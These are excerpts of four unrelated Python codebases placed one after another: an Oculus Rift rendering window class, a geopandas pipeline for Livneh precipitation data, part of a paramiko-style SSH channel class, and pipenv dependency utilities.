def farClip(self):
"""Distance to the far clipping plane in meters."""
return self._farClip
@farClip.setter
def farClip(self, value):
self._farClip = value
self._updateProjectionMatrix()
@property
def projectionMatrix(self):
"""Get the projection matrix for the current eye buffer. Note that
setting `projectionMatrix` manually will break visibility culling.
"""
if not self._monoscopic:
if self.buffer == 'left':
return self._projectionMatrix[libovr.EYE_LEFT]
elif self.buffer == 'right':
return self._projectionMatrix[libovr.EYE_RIGHT]
else:
return self._projectionMatrix
@property
def isBoundaryVisible(self):
"""True if the VR boundary is visible.
"""
result, isVisible = libovr.getBoundaryVisible()
return bool(isVisible)
def getBoundaryDimensions(self, boundaryType='PlayArea'):
"""Get boundary dimensions.
Parameters
----------
boundaryType : str
Boundary type, can be 'PlayArea' or 'Outer'.
Returns
-------
ndarray
Dimensions of the boundary meters [x, y, z].
"""
result, dims = libovr.getBoundaryDimensions(
RIFT_BOUNDARY_TYPE[boundaryType])
return dims
@property
def connectedControllers(self):
"""Connected controller types (`list` of `str`)"""
controllers = libovr.getConnectedControllerTypes()
ctrlKeys = {val: key for key, val in RIFT_CONTROLLER_TYPES.items()}
return [ctrlKeys[ctrl] for ctrl in controllers]
def updateInputState(self, controllers=None):
"""Update all connected controller states. This updates controller input
states for an input device managed by `LibOVR`.
The polling time for each device is accessible through the
`controllerPollTimes` attribute. This attribute returns a dictionary
where the polling time from the last `updateInputState` call for a
given controller can be retrieved by using the name as a key.
Parameters
----------
controllers : tuple or list, optional
List of controllers to poll. If `None`, all available controllers
will be polled.
Examples
--------
Poll the state of specific controllers by name::
controllers = ['XBox', 'Touch']
updateInputState(controllers)
"""
if controllers is None:
toPoll = libovr.getConnectedControllerTypes()
elif isinstance(controllers, (list, tuple,)):
toPoll = [RIFT_CONTROLLER_TYPES[ctrl] for ctrl in controllers]
else:
raise TypeError("Argument 'controllers' must be iterable type.")
for i in toPoll:
result, t_sec = libovr.updateInputState(i)
self.controllerPollTimes[RIFT_CONTROLLER_TYPES[i]] = t_sec
def _waitToBeginHmdFrame(self):
"""Wait until the HMD surfaces are available for rendering.
"""
# First time this function is called, make True.
if not self._allowHmdRendering:
self._allowHmdRendering = True
# update session status
result, status = libovr.getSessionStatus()
self._sessionStatus = status
# get performance stats for the last frame
self._updatePerfStats()
# Wait for the buffer to be freed by the compositor, this is like
# waiting for v-sync.
libovr.waitToBeginFrame(self._frameIndex)
# update input states
if self.autoUpdateInput:
self.updateInputState()
#if result == ovr.SUCCESS_NOT_VISIBLE:
# pass
#self.updateInputState() # poll controller states
# # update the tracking state
# if self.autoUpdatePoses:
# # get the current frame time
# absTime = libovr.getPredictedDisplayTime(self._frameIndex)
# # Get the current tracking state structure, estimated poses for the
# # head and hands are stored here. The latency marker for computing
# # motion-to-photon latency is set when this function is called.
# self.calcEyePoses()
def _startHmdFrame(self):
"""Prepare to render an HMD frame. This must be called every frame
before flipping or setting the view buffer.
This function will wait until the HMD is ready to begin rendering before
continuing. The current frame texture from the swap chain are pulled
from the SDK and made available for binding.
"""
# begin frame
libovr.beginFrame(self._frameIndex)
# get the next available buffer texture in the swap chain
result, swapChainIdx = libovr.getTextureSwapChainCurrentIndex(
libovr.TEXTURE_SWAP_CHAIN0)
result, colorTextureId = libovr.getTextureSwapChainBufferGL(
libovr.TEXTURE_SWAP_CHAIN0, swapChainIdx)
self.frameTexture = colorTextureId
# If mono mode, we want to configure the render framebuffer at this
# point since 'setBuffer' will not be called.
if self._monoscopic:
self._prepareMonoFrame()
def _startOfFlip(self):
"""Custom :py:class:`~Rift._startOfFlip` for HMD rendering. This
finalizes the HMD texture before diverting drawing operations back to
the on-screen window. This allows :py:class:`~Rift.flip` to swap the
on-screen and HMD buffers when called. This function always returns
`True`.
Returns
-------
True
"""
# Switch off multi-sampling
GL.glDisable(GL.GL_MULTISAMPLE)
if self._allowHmdRendering:
# resolve MSAA buffers
self._resolveMSAA()
# commit current texture buffer to the swap chain
libovr.commitTextureSwapChain(libovr.TEXTURE_SWAP_CHAIN0)
# Call end_frame and increment the frame index, no more rendering to
# HMD's view texture at this point.
result, _ = libovr.endFrame(self._frameIndex)
if libovr.failure(result):
if result == libovr.ERROR_DISPLAY_LOST: # display lost!
libovr.destroyMirrorTexture()
libovr.destroyTextureSwapChain(libovr.TEXTURE_SWAP_CHAIN0)
libovr.destroy()
libovr.shutdown()
_, msg = libovr.getLastErrorInfo()
raise LibOVRError(msg)
self._frameIndex += 1 # increment frame index
# Set to None so the 'size' attribute returns the on-screen window size.
self.buffer = None
# Make sure this is called after flipping, this updates VR information
# and diverts rendering to the HMD texture.
#self.callOnFlip(self._waitToBeginHmdFrame)
# Call frame timing routines
#self.callOnFlip(self._updatePerformanceStats)
# This always returns True
return True
def flip(self, clearBuffer=True, drawMirror=True):
"""Submit view buffer images to the HMD's compositor for display at next
V-SYNC and draw the mirror texture to the on-screen window. This must
be called every frame.
Parameters
----------
clearBuffer : bool
Clear the frame after flipping.
drawMirror : bool
Draw the HMD mirror texture from the compositor to the window.
Returns
-------
float
Absolute time in seconds when control was given back to the
application. The difference between the current and previous values
should be very close to 1 / refreshRate of the HMD.
Notes
-----
* The HMD compositor and application are asynchronous, therefore there
is no guarantee that the timestamp returned by 'flip' corresponds to
the exact vertical retrace time of the HMD.
"""
# NOTE: Most of this code is shared with the regular Window's flip
# function for compatibility. We're only concerned with calling the
# _startOfFlip function and drawing the mirror texture to the onscreen
# window. Display timing functions are kept in for now, but they are not
# active.
#
flipThisFrame = self._startOfFlip()
if flipThisFrame:
self._prepareFBOrender()
# need blit the framebuffer object to the actual back buffer
result, mirrorTexId = libovr.getMirrorTexture()
if libovr.failure(result):
_, msg = libovr.getLastErrorInfo()
raise LibOVRError(msg)
# unbind the framebuffer as the render target
GL.glBindFramebufferEXT(GL.GL_FRAMEBUFFER_EXT, 0)
GL.glDisable(GL.GL_BLEND)
stencilOn = GL.glIsEnabled(GL.GL_STENCIL_TEST)
GL.glDisable(GL.GL_STENCIL_TEST)
win_w, win_h = self.frameBufferSize
self.viewport = self.scissor = (0, 0, win_w, win_h)
# draw the mirror texture, if not anything drawn to the backbuffer
# will be displayed instead
if drawMirror:
# blit mirror texture
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self._mirrorFbo)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, 0)
GL.glEnable(GL.GL_FRAMEBUFFER_SRGB)
# bind the rift's texture to the framebuffer
GL.glFramebufferTexture2D(
GL.GL_READ_FRAMEBUFFER,
GL.GL_COLOR_ATTACHMENT0,
GL.GL_TEXTURE_2D, mirrorTexId, 0)
win_w, win_h = self.frameBufferSize
tex_w, tex_h = self._mirrorRes
self.viewport = self.scissor = (0, 0, win_w, win_h)
GL.glClearColor(0.0, 0.0, 0.0, 1.0)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glBlitFramebuffer(0, 0, tex_w, tex_h,
0, win_h, win_w, 0, # flips texture
GL.GL_COLOR_BUFFER_BIT,
GL.GL_LINEAR)
GL.glDisable(GL.GL_FRAMEBUFFER_SRGB)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self._finishFBOrender()
# | |
import geopandas
import pandas as pd
import xarray as xr
import dataimports.waterboundary as wbd
from shapely.geometry import Polygon
def aggregateprocessedfiles(directory: str, years: range) -> pd.DataFrame:
'''
Generates a new dataframe in the form:
index 1 2 ... n-1 n
<year 1>
<year 2>
.
.
.
<year t - 1>
<year t> . . ... . .
from a specified set files, where each row in the new dataframe contains the year's n grid cell's precipitation data.
The input files are imported from a specified directory with file names in the form: 'prec.<year>.csv' where <year> is a year in the specified list of years.
'''
first: bool = True
for yr in years:
if first:
df = pd.read_csv(directory + 'prec.' + str(yr) + '.csv').sort_values(by = ['id']).filter(['id', 'prec']).rename(columns = {'prec' : str(yr)}).set_index('id').T
first = False
else:
df2 = pd.read_csv(directory + 'prec.' + str(yr) + '.csv').sort_values(by = ['id']).filter(['id', 'prec']).rename(columns = {'prec' : str(yr)}).set_index('id').T
df = df.append(df2)
return df
def eventdates(directory: str, years: range) -> pd.DataFrame:
'''
Creates a dictionary with the year keys and dates stored as string values.
'''
events = []
for yr in years:
df = pd.read_csv(directory + 'prec.' + str(yr) + '.csv')
date = df.iloc[0].loc['time']
day = df['day'].iloc[0]
month = df['month'].iloc[0]
events.append([date, yr, month, day])
return pd.DataFrame(events, columns = ['date', 'year', 'month', 'day'])
def inputfilepaths(directory: str, vars: list, yrs: list) -> list:
'''
Generates a list of file paths in the specified directory with the form <var>.<year>.nc
Inputs:
(1) directory: string directory path.
(2) vars: list of variable identification strings (i.e. prec, tmin, tmax, etc.).
(3) yrs: list of year strings in the form yyyy.
Output: a list of string file paths.
'''
files: list = []
filename: str = ''
print('Input file list: \n\t[')
for var in vars:
for yr in yrs:
filename = str(var) + '.' + str(yr) + '.nc'
files.append(directory + filename)
print('\t' + ' ' + filename)
print('\t]')
return files
def outputfilepaths(directory: str, filelist: str, extension: str = '.csv') -> list:
'''
Generates a list of file paths in the form <var>.<year>.<extension>
Inputs:
(1) directory: string directory path.
(2) filelist: list of paths to files that will be processed.
(3) extension: string output file extension, .csv by default.
Output: a slist of string file paths.
'''
print('Output file list: \n\t[')
files: list = []
for file in filelist:
outpath = outputfilepath(directory, file, extension)
files.append(outpath)
print('\t]')
return files
def outputfilepath(directory: str, file: str, extension: str = '.csv'):
split: list = file.rsplit('/', 1)
file: str = split[1]
split: str = file.rsplit('.', 1)
name: str = split[0]
filename = name + extension
print('\t' + ' ' + filename)
return directory + filename
def processfiles(files: list, outputs: list, box: list, shape: geopandas.GeoDataFrame, shapearea: float, maxdaydirectory: str) -> dict:
maxdays = {}
for i, file in enumerate(files):
print(i)
df = processfile(file, box, shape)
if i == 0:
print('Generating IDs dataframe...')
ids = km2areasandIDs(df, shapearea)
print(ids.head())
print('\t Merging areas and IDs...')
df = mergebylatlon(df, ids)
df.to_csv(outputs[i])
day = maxday(df, outputfilepath(maxdaydirectory, file))
maxdays.update({day[0] : day[1]})
return maxdays
def maxday(df, outpath: str) -> tuple:
print('Computing max day:')
df['weightedprec'] = df['prec'] * df['areaweight']
day = df.groupby(['time', 'year', 'month', 'day'])['weightedprec'].sum().reset_index()
maxprec = day['weightedprec'].max()
maxday = day[day['weightedprec'] == maxprec]
maxdate = maxday.iloc[0]['time']
maximum = df[df['time'] == maxdate]
maximum.to_csv(outpath)
entry = (maxdate, maxprec)
print(entry)
return entry
def processfile(filepath: str, boundingbox: list, mask: geopandas.GeoDataFrame, coordinatesystem: str = '4326', shift: int = 1/32):
df = importfile(filepath, boundingbox)
print('\t Creating file geometry...')
gdf = convert2geodataframe(df, coordinatesystem)
print('\t Converting livneh points to grid geometry...')
grids = points2grids(gdf, shift)
print('\t Clipping data to watershed polygon (this may take a while)...')
wbgrids = clipdataframe(gdf, mask)
return wbgrids
def importfile(filepath: str, boundingbox: list)-> pd.DataFrame:
'''
Imports a Livneh NetCDF file and returns a pandas DataFrame
Inputs:
(1) filepath: Livneh NetCDF string file path
(2) boundingbox: list of latitude and longitude coordinates in form [E, S, W, N].
Output: a pandas DataFrame
'''
print('Importing ' + str(filepath))
#Import NetCDF file as XArray data
netCDF = xr.open_dataset(filepath)
if boundingbox is not None:
# bounding box is based on 180 longitudes
# livneh data is based on 360 degree longitude
print('\t Clipping data to boundary box...')
netCDF = netCDF \
.where(netCDF.lon > boundingbox[0] + 360, drop=True) \
.where(netCDF.lat > boundingbox[1], drop=True) \
.where(netCDF.lon < boundingbox[2] + 360, drop=True) \
.where(netCDF.lat < boundingbox[3], drop=True)
df: pd.DataFrame = netCDF.to_dataframe().reset_index()
df: pd.DataFrame = __180longitude(df)
df: pd.DataFrame = __processdates(df)
return df
def convert2geodataframe(df: pd.DataFrame, coordinatesystem = '4326'):
gdf = geopandas.GeoDataFrame(df, geometry = geopandas.points_from_xy(df['lon'], df['lat']), crs='EPSG:' + str(coordinatesystem))
return gdf
def points2grids(gdf: geopandas.GeoDataFrame, shift: int = 1/32):
'''
Turns Livneh gridcell point geometry into a Livneh grid polygon.
Inputs:
(1) gdf: geopandas.GeoDataFrame contining the Livneh grid cell centroids.
(2) shift: a radius shift from gridcell centroid to the grid polygon edges. 1/32nd degree by default.
Output: a geopandas.GeoDataFrame containing the Livneh grids polygon geometry.
'''
geometry: list = []
for i, row in gdf.iterrows():
w: float = float(row['lon']) - shift
e: float = float(row['lon']) + shift
n: float = float(row['lat']) + shift
s: float = float(row['lat']) - shift
lons, lats = [w, e, e, w], [n, n, s, s]
geometry.append(Polygon(zip(lons, lats)))
gdf['geometry'] = geometry
return gdf
def clipdataframe(gdf: geopandas.GeoDataFrame, mask: geopandas.GeoDataFrame) -> geopandas.GeoDataFrame:
df = gdf.to_crs(mask.crs)
return geopandas.clip(df, mask, keep_geom_type=False)
def __180longitude(df: pd.DataFrame) -> pd.DataFrame:
df['lon'] = df['lon'].apply(lambda x: x - 360)
return df
def __processdates(df: pd.DataFrame) -> pd.DataFrame:
dt: list = df['time'].apply(lambda x: str(x).split("-", 4))
df['year'] = dt.apply(lambda y: int(y[0]))
df['month'] = dt.apply(lambda m: int(m[1]))
df['day'] = dt.apply(lambda d: int(d[2].split()[0]))
return df
def km2areasandIDs(gdf: geopandas.GeoDataFrame, totalarea: float):
t = gdf.iloc[0]['time']
df = gdf[gdf['time'] == t]
df = df.sort_values(by=['lat', 'lon'], ascending=[False, True])
df = df.reset_index()
df['id'] = df.index
df = df.to_crs('EPSG:3857')
df['area_km2'] = df['geometry'].area
df['area_km2'] = df['area_km2'].apply(lambda x: x / 1000000)
df['wsarea_km2'] = totalarea
df['areaweight'] = df['area_km2'] / totalarea
df = df.filter(['lat', 'lon', 'area_km2', 'wsarea_km2', 'areaweight', 'id'])
return df
def mergebylatlon(left, right):
df = left.merge(right, on=['lat', 'lon'], how='inner')
return df
def importlivnehfiles(filepaths: list, maskingdata = geopandas.GeoDataFrame, grids: bool = True, crs: str = '4326', max: bool = True, outputfilepaths: list = []):
'''
Imports a set of livneh files returning a list of the geopandas GeoDataFrames
Inputs:
(1) a string list of livneh netCDF filepaths
(2) a geopandas GeoDataFrame containing the watershed of interest, used to clip the data
(3) a boolean indicating if grids or points should be returned, the default value True indicates grids
(4) a string identifier for the coordinate reference system, '4356' by default.
Output: a list of geopandas GeoDataFrames
'''
i: int = 0
dfs: list = []
export: bool = False
if len(outputfilepaths) == len(filepaths):
export = True
# create a bounding box for importing the netCDF files
boundingbox = wbd.boundaryboxfromshape(maskingdata, buffer=True, buffersize=1/32)
for file in filepaths:
print('Processing ' + str(file) + '...')
netCDF = xr.open_dataset(file)
# edit longitudes: livneh longitudes are in 360 degree format, but the bounding boxes are in 180 (e.g. negative west longitude) format
netCDF = netCDF \
.where(netCDF.lon > boundingbox[0] + 360, drop=True) \
.where(netCDF.lat > boundingbox[1], drop=True) \
.where(netCDF.lon < boundingbox[2] + 360, drop=True) \
.where(netCDF.lat < boundingbox[3], drop=True)
# flattening the mult-index dataframe that comes fromfrom xarray
df: pd.DataFrame = __cleaner(netCDF.to_dataframe().reset_index())
# convert to geopandas with lat lon points
print('\t...creating file geometry')
df = geopandas.GeoDataFrame(df, geometry=geopandas.points_from_xy(df['lon'], df['lat']), crs='EPSG:' + str(crs))
if grids:
# convert to point to grids
df = __points2grids(df, crs=crs)
print('\t...clipping file to masking layer')
df = geopandas.clip(df, maskingdata, keep_geom_type=False)
# max precipitation day - make it a function that is passed in.
if max:
a = df.to_crs(epsg='3857')
a['area_m2'] = a['geometry'].area
wsarea = a[(a['month'] == 1) & (a['day'] == 1)]
wsarea['basin_area_m2'] = wsarea['area_m2'].sum()
wsarea = wsarea.filter(['time', 'basin_area_m2'])
merge = a.merge(wsarea, on='time')
merge['weights'] = merge['area_m2'] / merge['basin_area_m2']
merge['weightedprec'] = merge['prec'] * merge['weights']
day = merge.groupby(['time', 'year', 'month', 'day'])['weightedprec'].sum().reset_index()
print(str(day['weightedprec']) + ' on ' + str(day['time']))
time = day.iloc[0]['time']
maxday = merge[merge['time'] == str(time)]
#check | |
after
it completes.
:param int status: the exit code of the process
.. versionadded:: 1.2
"""
# in many cases, the channel will not still be open here.
# that's fine.
m = Message()
m.add_byte(cMSG_CHANNEL_REQUEST)
m.add_int(self.remote_chanid)
m.add_string('exit-status')
m.add_boolean(False)
m.add_int(status)
self.transport._send_user_message(m)
@open_only
def request_x11(self, screen_number=0, auth_protocol=None, auth_cookie=None,
single_connection=False, handler=None):
"""
Request an x11 session on this channel. If the server allows it,
further x11 requests can be made from the server to the client,
when an x11 application is run in a shell session.
From RFC4254::
It is RECOMMENDED that the 'x11 authentication cookie' that is
sent be a fake, random cookie, and that the cookie be checked and
replaced by the real cookie when a connection request is received.
If you omit the auth_cookie, a new secure random 128-bit value will be
generated, used, and returned. You will need to use this value to
verify incoming x11 requests and replace them with the actual local
x11 cookie (which requires some knowledge of the x11 protocol).
If a handler is passed in, the handler is called from another thread
whenever a new x11 connection arrives. The default handler queues up
incoming x11 connections, which may be retrieved using
`.Transport.accept`. The handler's calling signature is::
handler(channel: Channel, (address: str, port: int))
:param int screen_number: the x11 screen number (0, 10, etc.)
:param str auth_protocol:
the name of the X11 authentication method used; if none is given,
``"MIT-MAGIC-COOKIE-1"`` is used
:param str auth_cookie:
hexadecimal string containing the x11 auth cookie; if none is
given, a secure random 128-bit value is generated
:param bool single_connection:
if True, only a single x11 connection will be forwarded (by
default, any number of x11 connections can arrive over this
session)
:param function handler:
an optional handler to use for incoming X11 connections
:return: the auth_cookie used
"""
if auth_protocol is None:
auth_protocol = 'MIT-MAGIC-COOKIE-1'
if auth_cookie is None:
auth_cookie = binascii.hexlify(os.urandom(16))
m = Message()
m.add_byte(cMSG_CHANNEL_REQUEST)
m.add_int(self.remote_chanid)
m.add_string('x11-req')
m.add_boolean(True)
m.add_boolean(single_connection)
m.add_string(auth_protocol)
m.add_string(auth_cookie)
m.add_int(screen_number)
self._event_pending()
self.transport._send_user_message(m)
self._wait_for_event()
self.transport._set_x11_handler(handler)
return auth_cookie
@open_only
def request_forward_agent(self, handler):
"""
Request for a forward SSH Agent on this channel.
This is only valid for an ssh-agent from OpenSSH !!!
:param function handler:
a required handler to use for incoming SSH Agent connections
:return: True if we are ok, else False (at that time we always return ok)
:raises: SSHException in case of channel problem.
"""
m = Message()
m.add_byte(cMSG_CHANNEL_REQUEST)
m.add_int(self.remote_chanid)
m.add_string('auth-agent-req@<EMAIL>.<EMAIL>')
m.add_boolean(False)
self.transport._send_user_message(m)
self.transport._set_forward_agent_handler(handler)
return True
def get_transport(self):
"""
Return the `.Transport` associated with this channel.
"""
return self.transport
def set_name(self, name):
"""
Set a name for this channel. Currently it's only used to set the name
of the channel in logfile entries. The name can be fetched with the
`get_name` method.
:param str name: new channel name
"""
self._name = name
def get_name(self):
"""
Get the name of this channel that was previously set by `set_name`.
"""
return self._name
def get_id(self):
"""
Return the `int` ID # for this channel.
The channel ID is unique across a `.Transport` and usually a small
number. It's also the number passed to
`.ServerInterface.check_channel_request` when determining whether to
accept a channel request in server mode.
"""
return self.chanid
def set_combine_stderr(self, combine):
"""
Set whether stderr should be combined into stdout on this channel.
The default is ``False``, but in some cases it may be convenient to
have both streams combined.
If this is ``False``, and `exec_command` is called (or ``invoke_shell``
with no pty), output to stderr will not show up through the `recv`
and `recv_ready` calls. You will have to use `recv_stderr` and
`recv_stderr_ready` to get stderr output.
If this is ``True``, data will never show up via `recv_stderr` or
`recv_stderr_ready`.
:param bool combine:
``True`` if stderr output should be combined into stdout on this
channel.
:return: the previous setting (a `bool`).
.. versionadded:: 1.1
"""
data = bytes()
self.lock.acquire()
try:
old = self.combine_stderr
self.combine_stderr = combine
if combine and not old:
# copy old stderr buffer into primary buffer
data = self.in_stderr_buffer.empty()
finally:
self.lock.release()
if len(data) > 0:
self._feed(data)
return old
### socket API
def settimeout(self, timeout):
"""
Set a timeout on blocking read/write operations. The ``timeout``
argument can be a nonnegative float expressing seconds, or ``None``. If
a float is given, subsequent channel read/write operations will raise
a timeout exception if the timeout period value has elapsed before the
operation has completed. Setting a timeout of ``None`` disables
timeouts on socket operations.
``chan.settimeout(0.0)`` is equivalent to ``chan.setblocking(0)``;
``chan.settimeout(None)`` is equivalent to ``chan.setblocking(1)``.
:param float timeout:
seconds to wait for a pending read/write operation before raising
``socket.timeout``, or ``None`` for no timeout.
"""
self.timeout = timeout
def gettimeout(self):
"""
Returns the timeout in seconds (as a float) associated with socket
operations, or ``None`` if no timeout is set. This reflects the last
call to `setblocking` or `settimeout`.
"""
return self.timeout
def setblocking(self, blocking):
"""
Set blocking or non-blocking mode of the channel: if ``blocking`` is 0,
the channel is set to non-blocking mode; otherwise it's set to blocking
mode. Initially all channels are in blocking mode.
In non-blocking mode, if a `recv` call doesn't find any data, or if a
`send` call can't immediately dispose of the data, an error exception
is raised. In blocking mode, the calls block until they can proceed. An
EOF condition is considered "immediate data" for `recv`, so if the
channel is closed in the read direction, it will never block.
``chan.setblocking(0)`` is equivalent to ``chan.settimeout(0)``;
``chan.setblocking(1)`` is equivalent to ``chan.settimeout(None)``.
:param int blocking:
0 to set non-blocking mode; non-0 to set blocking mode.
"""
if blocking:
self.settimeout(None)
else:
self.settimeout(0.0)
def getpeername(self):
"""
Return the address of the remote side of this Channel, if possible.
This simply wraps `.Transport.getpeername`, used to provide enough of a
socket-like interface to allow asyncore to work. (asyncore likes to
call ``'getpeername'``.)
"""
return self.transport.getpeername()
def close(self):
"""
Close the channel. All future read/write operations on the channel
will fail. The remote end will receive no more data (after queued data
is flushed). Channels are automatically closed when their `.Transport`
is closed or when they are garbage collected.
"""
self.lock.acquire()
try:
# only close the pipe when the user explicitly closes the channel.
# otherwise they will get unpleasant surprises. (and do it before
# checking self.closed, since the remote host may have already
# closed the connection.)
if self._pipe is not None:
self._pipe.close()
self._pipe = None
if not self.active or self.closed:
return
msgs = self._close_internal()
finally:
self.lock.release()
for m in msgs:
if m is not None:
self.transport._send_user_message(m)
def recv_ready(self):
"""
Returns true if data is buffered and ready to be read from this
channel. A ``False`` result does not mean that the channel has closed;
it means you may need to wait before more data arrives.
:return:
``True`` if a `recv` call on this channel would immediately return
at least one byte; ``False`` otherwise.
"""
return self.in_buffer.read_ready()
def recv(self, nbytes):
"""
Receive data from the channel. The return value is a string
representing the data received. The maximum amount of data to be
received at once is specified by ``nbytes``. If a string of length zero
is returned, the channel stream has closed.
:param int nbytes: maximum number of bytes to read.
:return: received data, as a `str`
:raises socket.timeout:
if no data is ready before the timeout set by `settimeout`.
"""
try:
out = self.in_buffer.read(nbytes, self.timeout)
except PipeTimeout:
raise socket.timeout()
ack = self._check_add_window(len(out))
# no need to hold the channel lock when sending this
if ack > 0:
m = Message()
m.add_byte(cMSG_CHANNEL_WINDOW_ADJUST)
m.add_int(self.remote_chanid)
m.add_int(ack)
self.transport._send_user_message(m)
return out
def recv_stderr_ready(self):
"""
Returns true if data is buffered and ready to be read from this
channel's stderr stream. Only channels using `exec_command` or
`invoke_shell` without a pty will ever have data on the stderr
stream.
| |
in source["url"] or "pypi.org" in source["url"]
for source in sources
):
pkg_url = "https://pypi.org/pypi/{0}/json".format(name)
session = _get_requests_session()
try:
# Grab the hashes from the new warehouse API.
r = session.get(pkg_url, timeout=10)
api_releases = r.json()["releases"]
cleaned_releases = {}
for api_version, api_info in api_releases.items():
api_version = clean_pkg_version(api_version)
cleaned_releases[api_version] = api_info
for release in cleaned_releases[version]:
collected_hashes.append(release["digests"]["sha256"])
collected_hashes = ["sha256:" + s for s in collected_hashes]
except (ValueError, KeyError, ConnectionError):
if environments.is_verbose():
click_echo(
"{0}: Error generating hash for {1}".format(
crayons.red("Warning", bold=True), name
)
)
# # Collect un-collectable hashes (should work with devpi).
# try:
# collected_hashes = collected_hashes + list(
# list(resolver.resolve_hashes([result]).items())[0][1]
# )
# except (ValueError, KeyError, ConnectionError, IndexError):
# if verbose:
# print('Error generating hash for {}'.format(name))
req.hashes = sorted(set(collected_hashes))
name, _entry = req.pipfile_entry
entry = {}
if isinstance(_entry, six.string_types):
entry["version"] = _entry.lstrip("=")
else:
entry.update(_entry)
entry["version"] = version
entry["name"] = name
# if index:
# d.update({"index": index})
if markers_lookup.get(result.name):
entry.update({"markers": markers_lookup.get(result.name)})
entry = translate_markers(entry)
results.append(entry)
req_dir.cleanup()
return results
def multi_split(s, split):
"""Splits on multiple given separators."""
for r in split:
s = s.replace(r, "|")
return [i for i in s.split("|") if len(i) > 0]
def is_star(val):
return isinstance(val, six.string_types) and val == "*"
def is_pinned(val):
if isinstance(val, Mapping):
val = val.get("version")
return isinstance(val, six.string_types) and val.startswith("==")
def convert_deps_to_pip(deps, project=None, r=True, include_index=True):
""""Converts a Pipfile-formatted dependency to a pip-formatted one."""
from ._compat import NamedTemporaryFile
from .vendor.requirementslib.models.requirements import Requirement
dependencies = []
for dep_name, dep in deps.items():
indexes = project.sources if hasattr(project, "sources") else []
new_dep = Requirement.from_pipfile(dep_name, dep)
if new_dep.index:
include_index = True
req = new_dep.as_line(sources=indexes if include_index else None).strip()
dependencies.append(req)
if not r:
return dependencies
# Write requirements.txt to tmp directory.
f = NamedTemporaryFile(suffix="-requirements.txt", delete=False)
f.write("\n".join(dependencies).encode("utf-8"))
f.close()
return f.name
def mkdir_p(newdir):
"""works the way a good mkdir should :)
- already exists, silently complete
- regular file in the way, raise an exception
- parent directory(ies) does not exist, make them as well
From: http://code.activestate.com/recipes/82465-a-friendly-mkdir/
"""
if os.path.isdir(newdir):
pass
elif os.path.isfile(newdir):
raise OSError(
"a file with the same name as the desired dir, '{0}', already exists.".format(
newdir
)
)
else:
head, tail = os.path.split(newdir)
if head and not os.path.isdir(head):
mkdir_p(head)
if tail:
os.mkdir(newdir)
def is_required_version(version, specified_version):
"""Check to see if there's a hard requirement for version
number provided in the Pipfile.
"""
# Certain packages may be defined with multiple values.
if isinstance(specified_version, dict):
specified_version = specified_version.get("version", "")
if specified_version.startswith("=="):
return version.strip() == specified_version.split("==")[1].strip()
return True
def strip_ssh_from_git_uri(uri):
"""Return git+ssh:// formatted URI to git+git@ format"""
if isinstance(uri, six.string_types):
uri = uri.replace("git+ssh://", "git+")
return uri
def clean_git_uri(uri):
"""Cleans VCS uris from pip format"""
if isinstance(uri, six.string_types):
# Add scheme for parsing purposes, this is also what pip does
if uri.startswith("git+") and "://" not in uri:
uri = uri.replace("git+", "git+ssh://")
return uri
def is_editable(pipfile_entry):
if hasattr(pipfile_entry, "get"):
return pipfile_entry.get("editable", False) and any(
pipfile_entry.get(key) for key in ("file", "path") + VCS_LIST
)
return False
def is_installable_file(path):
"""Determine if a path can potentially be installed"""
from .patched.notpip._internal.utils.misc import is_installable_dir
from .patched.notpip._internal.utils.packaging import specifiers
from .patched.notpip._internal.download import is_archive_file
from ._compat import Path
if hasattr(path, "keys") and any(
key for key in path.keys() if key in ["file", "path"]
):
path = urlparse(path["file"]).path if "file" in path else path["path"]
if not isinstance(path, six.string_types) or path == "*":
return False
# If the string starts with a valid specifier operator, test if it is a valid
# specifier set before making a path object (to avoid breaking windows)
if any(path.startswith(spec) for spec in "!=<>~"):
try:
specifiers.SpecifierSet(path)
# If this is not a valid specifier, just move on and try it as a path
except specifiers.InvalidSpecifier:
pass
else:
return False
if not os.path.exists(os.path.abspath(path)):
return False
lookup_path = Path(path)
absolute_path = "{0}".format(lookup_path.absolute())
if lookup_path.is_dir() and is_installable_dir(absolute_path):
return True
elif lookup_path.is_file() and is_archive_file(absolute_path):
return True
return False
def is_file(package):
"""Determine if a package name is for a File dependency."""
if hasattr(package, "keys"):
return any(key for key in package.keys() if key in ["file", "path"])
if os.path.exists(str(package)):
return True
for start in SCHEME_LIST:
if str(package).startswith(start):
return True
return False
def pep440_version(version):
"""Normalize version to PEP 440 standards"""
from .patched.notpip._internal.index import parse_version
# Use pip built-in version parser.
return str(parse_version(version))
def pep423_name(name):
"""Normalize package name to PEP 423 style standard."""
name = name.lower()
if any(i not in name for i in (VCS_LIST + SCHEME_LIST)):
return name.replace("_", "-")
else:
return name
def proper_case(package_name):
"""Properly case project name from pypi.org."""
# Hit the simple API.
r = _get_requests_session().get(
"https://pypi.org/pypi/{0}/json".format(package_name), timeout=0.3, stream=True
)
if not r.ok:
raise IOError(
"Unable to find package {0} in PyPI repository.".format(package_name)
)
r = parse.parse("https://pypi.org/pypi/{name}/json", r.url)
good_name = r["name"]
return good_name
def split_section(input_file, section_suffix, test_function):
"""
Split a pipfile or a lockfile section out by section name and test function
:param dict input_file: A dictionary containing either a pipfile or lockfile
:param str section_suffix: A string of the name of the section
:param func test_function: A test function to test against the value in the key/value pair
>>> split_section(my_lockfile, 'vcs', is_vcs)
{
'default': {
"six": {
"hashes": [
"sha256:832dc0e10feb1aa2c68dcc57dbb658f1c7e65b9b61af69048abc87a2db00a0eb",
"sha256:70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9"
],
"version": "==1.11.0"
}
},
'default-vcs': {
"e1839a8": {
"editable": true,
"path": "."
}
}
}
"""
pipfile_sections = ("packages", "dev-packages")
lockfile_sections = ("default", "develop")
if any(section in input_file for section in pipfile_sections):
sections = pipfile_sections
elif any(section in input_file for section in lockfile_sections):
sections = lockfile_sections
else:
# return the original file if we can't find any pipfile or lockfile sections
return input_file
for section in sections:
split_dict = {}
entries = input_file.get(section, {})
for k in list(entries.keys()):
if test_function(entries.get(k)):
split_dict[k] = entries.pop(k)
input_file["-".join([section, section_suffix])] = split_dict
return input_file
def split_file(file_dict):
"""Split VCS and editable dependencies out from file."""
from .vendor.requirementslib.utils import is_vcs
sections = {
"vcs": is_vcs,
